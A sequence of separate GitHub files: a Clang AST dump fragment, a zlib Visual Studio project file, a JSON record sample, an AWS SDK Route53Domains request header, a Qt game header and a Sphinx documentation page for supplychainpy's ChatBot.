"pointer" : 74 }, <"ARCUnbridgedCast"> )>, <"BuiltinType" : ( { "pointer" : 75 }, <"BuiltinFn"> )>, <"ComplexType" : ( { "pointer" : 76 } )>, <"ComplexType" : ( { "pointer" : 77 } )>, <"ComplexType" : ( { "pointer" : 78 } )>, <"ComplexType" : ( { "pointer" : 79 } )>, <"BuiltinType" : ( { "pointer" : 80 }, <"ObjCId"> )>, <"BuiltinType" : ( { "pointer" : 81 }, <"ObjCClass"> )>, <"BuiltinType" : ( { "pointer" : 82 }, <"ObjCSel"> )>, <"PointerType" : ( { "pointer" : 83 }, { "type_ptr" : 23 } )>, <"BuiltinType" : ( { "pointer" : 84 }, <"NullPtr"> )>, <"BuiltinType" : ( { "pointer" : 85 }, <"Half"> )>, <"RecordType" : ( { "pointer" : 86 }, 87 )>, <"PointerType" : ( { "pointer" : 88 }, { "type_ptr" : 8, "is_const" : true } )>, <"PointerType" : ( { "pointer" : 89 }, { "type_ptr" : 25, "is_const" : true } )>, <"PointerType" : ( { "pointer" : 90 }, { "type_ptr" : 25 } )>, <"RecordType" : ( { "pointer" : 91 }, 92 )>, <"ConstantArrayType" : ( { "pointer" : 93 }, { "element_type" : { "type_ptr" : 91 }, "stride" : 24 }, 1 )>, <"ObjCObjectType" : ( { "pointer" : 94 }, { "base_type" : 80 } )>, <"ObjCObjectPointerType" : ( { "pointer" : 95 }, { "type_ptr" : 94 } )>, <"TypedefType" : ( { "pointer" : 96, "desugared_type" : 95 }, { "child_type" : { "type_ptr" : 95 }, "decl_ptr" : 97 } )>, <"TypedefType" : ( { "pointer" : 22, "desugared_type" : 95 }, { "child_type" : { "type_ptr" : 96 }, "decl_ptr" : 21 } )>, <"NoneType" : ( { "pointer" : 0 } )> ] } )>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <ItemGroup Label="ProjectConfigurations"> <ProjectConfiguration Include="Debug|Itanium"> <Configuration>Debug</Configuration> <Platform>Itanium</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Debug|Win32"> <Configuration>Debug</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Debug|x64"> <Configuration>Debug</Configuration> <Platform>x64</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|Itanium"> <Configuration>Release</Configuration> <Platform>Itanium</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|Win32"> <Configuration>Release</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|x64"> <Configuration>Release</Configuration> <Platform>x64</Platform> </ProjectConfiguration> </ItemGroup> <PropertyGroup Label="Globals"> <ProjectGuid>{C52F9E7B-498A-42BE-8DB4-85A15694366A}</ProjectGuid> <Keyword>Win32Proj</Keyword> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> <PlatformToolset>v110</PlatformToolset> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>Unicode</CharacterSet> <PlatformToolset>v110</PlatformToolset> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> <PlatformToolset>v110</PlatformToolset> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <CharacterSet>MultiByte</CharacterSet> <PlatformToolset>v110</PlatformToolset> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <ImportGroup Label="ExtensionSettings"> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <PropertyGroup Label="UserMacros" /> <PropertyGroup> <_ProjectFileVersion>10.0.30128.1</_ProjectFileVersion> <OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">x86\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">x86\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">x86\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">x86\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">x64\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">x64\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">ia64\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">ia64\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">true</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Release|x64'">x64\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Release|x64'">x64\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</GenerateManifest> <OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">ia64\TestZlibDll$(Configuration)\</OutDir> <IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">ia64\TestZlibDll$(Configuration)\Tmp\</IntDir> <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">false</LinkIncremental> <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">false</GenerateManifest> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" /> <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" /> <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" /> </PropertyGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <ClCompile> <Optimization>Disabled</Optimization> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>WIN32;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <MinimalRebuild>true</MinimalRebuild> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>x86\ZlibDllDebug\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <ProgramDatabaseFile>$(OutDir)testzlib.pdb</ProgramDatabaseFile> <SubSystem>Console</SubSystem> <RandomizedBaseAddress>false</RandomizedBaseAddress> <DataExecutionPrevention> </DataExecutionPrevention> <TargetMachine>MachineX86</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ClCompile> <Optimization>MaxSpeed</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <OmitFramePointers>true</OmitFramePointers> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>WIN32;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <FunctionLevelLinking>true</FunctionLevelLinking> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>x86\ZlibDllRelease\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <SubSystem>Console</SubSystem> <OptimizeReferences>true</OptimizeReferences> <EnableCOMDATFolding>true</EnableCOMDATFolding> <RandomizedBaseAddress>false</RandomizedBaseAddress> <DataExecutionPrevention> </DataExecutionPrevention> <TargetMachine>MachineX86</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <Midl> <TargetEnvironment>X64</TargetEnvironment> </Midl> <ClCompile> <Optimization>Disabled</Optimization> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;_DEBUG;_CONSOLE;WIN64;%(PreprocessorDefinitions)</PreprocessorDefinitions> <MinimalRebuild>true</MinimalRebuild> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>x64\ZlibDllDebug\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <ProgramDatabaseFile>$(OutDir)testzlib.pdb</ProgramDatabaseFile> <SubSystem>Console</SubSystem> <TargetMachine>MachineX64</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Itanium'"> <Midl> <TargetEnvironment>Itanium</TargetEnvironment> </Midl> <ClCompile> <Optimization>Disabled</Optimization> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;_DEBUG;_CONSOLE;WIN64;%(PreprocessorDefinitions)</PreprocessorDefinitions> <MinimalRebuild>true</MinimalRebuild> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>ia64\ZlibDllDebug\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <ProgramDatabaseFile>$(OutDir)testzlib.pdb</ProgramDatabaseFile> <SubSystem>Console</SubSystem> <TargetMachine>MachineIA64</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <Midl> <TargetEnvironment>X64</TargetEnvironment> </Midl> <ClCompile> <Optimization>MaxSpeed</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <OmitFramePointers>true</OmitFramePointers> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;NDEBUG;_CONSOLE;WIN64;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <FunctionLevelLinking>true</FunctionLevelLinking> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>x64\ZlibDllRelease\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <SubSystem>Console</SubSystem> <OptimizeReferences>true</OptimizeReferences> <EnableCOMDATFolding>true</EnableCOMDATFolding> <TargetMachine>MachineX64</TargetMachine> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Itanium'"> <Midl> <TargetEnvironment>Itanium</TargetEnvironment> </Midl> <ClCompile> <Optimization>MaxSpeed</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <OmitFramePointers>true</OmitFramePointers> <AdditionalIncludeDirectories>..\..\..;..\..\minizip;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_DEPRECATE;ZLIB_WINAPI;NDEBUG;_CONSOLE;WIN64;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <FunctionLevelLinking>true</FunctionLevelLinking> <PrecompiledHeader> </PrecompiledHeader> <AssemblerListingLocation>$(IntDir)</AssemblerListingLocation> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> </ClCompile> <Link> <AdditionalDependencies>ia64\ZlibDllRelease\zlibwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> <OutputFile>$(OutDir)testzlibdll.exe</OutputFile> <GenerateDebugInformation>true</GenerateDebugInformation> <SubSystem>Console</SubSystem> <OptimizeReferences>true</OptimizeReferences> <EnableCOMDATFolding>true</EnableCOMDATFolding> <TargetMachine>MachineIA64</TargetMachine> </Link> </ItemDefinitionGroup> <ItemGroup> <ClCompile Include="..\..\testzlib\testzlib.c" /> </ItemGroup> <ItemGroup> <ProjectReference Include="zlibvc.vcxproj"> <Project>{8fd826f8-3739-44e6-8cc8-997122e53b8d}</Project> </ProjectReference> </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> </ImportGroup> </Project>
{ "pile_set_name": "Github" }
[ { "Id": "3e399241", "IdLineage": [ "sfdsfdsfs", "sdfdsfdsf" ], "Individuals": [ { "Id": "1232112", "IdLineage": [ "fdsfsd1" ], "Events": [ { "RecordId": "2132121321", "RecordType": "SALE", "EventDate": "2016-01-04T05:00:00Z" }, { "RecordId": "123213212", "RecordType": "SALE", "EventDate": "2012-07-16T04:00:00Z" } ] }, { "Id": "ssf2112", "IdLineage": [], "Events": [ { "RecordId": "123213ds21", "RecordType": "ACXIOMRECORD", "EventDate": "2017-12-17T03:33:54.875Z" } ] }, { "Id": "asadsad", "IdLineage": [], "Events": [ { "RecordId": "213213sa21", "RecordType": "SALE", "EventDate": "2018-03-09T05:00:00Z" } ] } ] } ]
{ "pile_set_name": "Github" }
/** * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * SPDX-License-Identifier: Apache-2.0. */ #pragma once #include <aws/route53domains/Route53Domains_EXPORTS.h> #include <aws/route53domains/Route53DomainsRequest.h> #include <aws/core/utils/memory/stl/AWSString.h> #include <utility> namespace Aws { namespace Route53Domains { namespace Model { /** * <p>The <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_GetOperationDetail.html">GetOperationDetail</a> * request includes the following element.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53domains-2014-05-15/GetOperationDetailRequest">AWS * API Reference</a></p> */ class AWS_ROUTE53DOMAINS_API GetOperationDetailRequest : public Route53DomainsRequest { public: GetOperationDetailRequest(); // Service request name is the Operation name which will send this request out, // each operation should has unique request name, so that we can get operation's name from this request. // Note: this is not true for response, multiple operations may have the same response name, // so we can not get operation's name from response. inline virtual const char* GetServiceRequestName() const override { return "GetOperationDetail"; } Aws::String SerializePayload() const override; Aws::Http::HeaderValueCollection GetRequestSpecificHeaders() const override; /** * <p>The identifier for the operation for which you want to get the status. Route * 53 returned the identifier in the response to the original request.</p> */ inline const Aws::String& GetOperationId() const{ return m_operationId; } /** * <p>The identifier for the operation for which you want to get the status. Route * 53 returned the identifier in the response to the original request.</p> */ inline bool OperationIdHasBeenSet() const { return m_operationIdHasBeenSet; } /** * <p>The identifier for the operation for which you want to get the status. Route * 53 returned the identifier in the response to the original request.</p> */ inline void SetOperationId(const Aws::String& value) { m_operationIdHasBeenSet = true; m_operationId = value; } /** * <p>The identifier for the operation for which you want to get the status. Route * 53 returned the identifier in the response to the original request.</p> */ inline void SetOperationId(Aws::String&& value) { m_operationIdHasBeenSet = true; m_operationId = std::move(value); } /** * <p>The identifier for the operation for which you want to get the status. Route * 53 returned the identifier in the response to the original request.</p> */ inline void SetOperationId(const char* value) { m_operationIdHasBeenSet = true; m_operationId.assign(value); } /** * <p>The identifier for the operation for which you want to get the status. Route * 53 returned the identifier in the response to the original request.</p> */ inline GetOperationDetailRequest& WithOperationId(const Aws::String& value) { SetOperationId(value); return *this;} /** * <p>The identifier for the operation for which you want to get the status. Route * 53 returned the identifier in the response to the original request.</p> */ inline GetOperationDetailRequest& WithOperationId(Aws::String&& value) { SetOperationId(std::move(value)); return *this;} /** * <p>The identifier for the operation for which you want to get the status. Route * 53 returned the identifier in the response to the original request.</p> */ inline GetOperationDetailRequest& WithOperationId(const char* value) { SetOperationId(value); return *this;} private: Aws::String m_operationId; bool m_operationIdHasBeenSet; }; } // namespace Model } // namespace Route53Domains } // namespace Aws
{ "pile_set_name": "Github" }
#pragma once #include <unordered_map> #include <vector> #include "View2.h" #include <QMap> #include <QMutex> #include <QKeyEvent> #include <QElapsedTimer> #include "Sound.h" #include <CoreInterface.h> class Representation : public QObject { Q_OBJECT public: Representation(QObject* parent = nullptr); struct Performance { QElapsedTimer timer; qint64 mutex_ns; }; const Performance& GetPerformance() { return performance_; } void ResetPerformance(); kv::GrowingFrame GetGrowingFrame() const { return kv::GrowingFrame(new_frame_); } void Swap(); void Process(); void Click(int x, int y); void HandleKeyboardDown(QKeyEvent* event); void HandleKeyboardUp(QKeyEvent* event); void ResetKeysState(); void HandleInput(); SoundPlayer& GetSoundPlayer() { return player_; } signals: void chatMessage(const QString& html); void systemText(const QString& tab, const QString& text); void clearSystemTexts(); void removeEmptyTabs(); private: QMap<Qt::Key, bool> keys_state_; Performance performance_; QElapsedTimer autoplay_timer_; bool autoplay_; QElapsedTimer message_sending_interval_; QMutex mutex_; void SynchronizeViews(); void PerformPixelMovement(); void Draw(); void DrawInterface(); QElapsedTimer pixel_movement_tick_; quint32 current_frame_id_; bool is_updated_; using DataType = kv::FrameData; DataType* old_frame_; DataType* new_frame_; DataType first_data_; DataType second_data_; DataType current_frame_; struct ViewWithFrameId { View2 view; quint32 frame_id; }; std::unordered_map<quint32, ViewWithFrameId> views_; QVector<View2> interface_views_; class Camera { public: Camera(); void SetPos(int new_pos_x, int new_pos_y); void PerformPixelMovement(); int GetFullShiftX(); int GetFullShiftY(); private: int pos_x; int pos_y; int pixel_shift_x_; int pixel_shift_y_; } camera_; SoundPlayer player_; };
{ "pile_set_name": "Github" }
<!DOCTYPE html> <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]--> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>supplychainpy.bot package &mdash; supplychainpy 0.0.4 documentation</title> <link rel="stylesheet" href="_static/css/theme.css" type="text/css" /> <link rel="index" title="Index" href="genindex.html"/> <link rel="search" title="Search" href="search.html"/> <link rel="top" title="supplychainpy 0.0.4 documentation" href="index.html"/> <script src="_static/js/modernizr.min.js"></script> </head> <body class="wy-body-for-nav" role="document"> <div class="wy-grid-for-nav"> <nav data-toggle="wy-nav-shift" class="wy-nav-side"> <div class="wy-side-scroll"> <div class="wy-side-nav-search"> <a href="index.html" class="icon icon-home"> supplychainpy </a> <div class="version"> 0.0.4 </div> <div role="search"> <form id="rtd-search-form" class="wy-form" action="search.html" method="get"> <input type="text" name="q" placeholder="Search docs" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation"> <ul> <li class="toctree-l1"><a class="reference internal" href="changelog.html">Change Log</a></li> <li class="toctree-l1"><a class="reference internal" href="installation.html">Installation</a></li> <li class="toctree-l1"><a class="reference internal" href="quickstart.html">Quick Guide</a></li> <li class="toctree-l1"><a class="reference internal" href="reporting.html">Supplychainpy Reporting Suite</a></li> <li class="toctree-l1"><a class="reference internal" href="inventory.html">Inventory Modeling and Analysis Made Easy with Supplychainpy</a></li> <li class="toctree-l1"><a class="reference internal" href="pandas.html">Using supplychainpy with Pandas, Jupyter and Matplotlib</a></li> <li class="toctree-l1"><a class="reference internal" href="ahp.html">Analytic Hierarchy Process</a></li> <li class="toctree-l1"><a class="reference internal" href="monte_carlo_simulation.html">Monte Carlo Simulation</a></li> <li class="toctree-l1"><a class="reference internal" href="docker.html">Supplychainpy with Docker</a></li> <li class="toctree-l1"><a class="reference internal" href="calculations.html">Formulas and Equations</a></li> </ul> </div> </div> </nav> <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"> <nav class="wy-nav-top" role="navigation" aria-label="top navigation"> <i data-toggle="wy-nav-top" class="fa fa-bars"></i> <a href="index.html">supplychainpy</a> </nav> <div class="wy-nav-content"> <div class="rst-content"> <div role="navigation" aria-label="breadcrumbs navigation"> <ul class="wy-breadcrumbs"> <li><a href="index.html">Docs</a> &raquo;</li> <li>supplychainpy.bot package</li> <li class="wy-breadcrumbs-aside"> <a href="_sources/supplychainpy.bot.rst.txt" rel="nofollow"> View page source</a> </li> </ul> <hr/> </div> <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article"> <div itemprop="articleBody"> <div class="section" id="supplychainpy-bot-package"> <h1>supplychainpy.bot package<a class="headerlink" href="#supplychainpy-bot-package" title="Permalink to this headline">¶</a></h1> <div class="section" id="submodules"> <h2>Submodules<a class="headerlink" href="#submodules" title="Permalink to this headline">¶</a></h2> </div> <div class="section" id="module-supplychainpy.bot.dash"> <span id="supplychainpy-bot-dash-module"></span><h2>supplychainpy.bot.dash module<a class="headerlink" href="#module-supplychainpy.bot.dash" title="Permalink to this headline">¶</a></h2> <dl class="class"> <dt id="supplychainpy.bot.dash.ChatBot"> <em class="property">class </em><code class="descclassname">supplychainpy.bot.dash.</code><code class="descname">ChatBot</code><a class="headerlink" href="#supplychainpy.bot.dash.ChatBot" title="Permalink to this definition">¶</a></dt> <dd><p>Bases: <code class="xref py py-class docutils literal"><span class="pre">object</span></code></p> <p>Chat Bot for supplychainpy Reporting.</p> <dl class="staticmethod"> <dt id="supplychainpy.bot.dash.ChatBot.chat_machine"> <em class="property">static </em><code class="descname">chat_machine</code><span class="sig-paren">(</span><em>message: str</em><span class="sig-paren">)</span> &#x2192; typing.List[str]<a class="headerlink" href="#supplychainpy.bot.dash.ChatBot.chat_machine" title="Permalink to this definition">¶</a></dt> <dd><p>Interact with chat bot my sending a message and waiting for a response. :param message: The message for the chat bot. :type message: str</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field-odd field"><th class="field-name">Returns:</th><td class="field-body">The response from the chat bot.</td> </tr> <tr class="field-even field"><th class="field-name">Return type:</th><td class="field-body">list</td> </tr> </tbody> </table> <p>Examples: &gt;&gt;&gt; chat_bot = ChatBot() &gt;&gt;&gt; response = chat_bot.chat_machine(message=’hello’)</p> 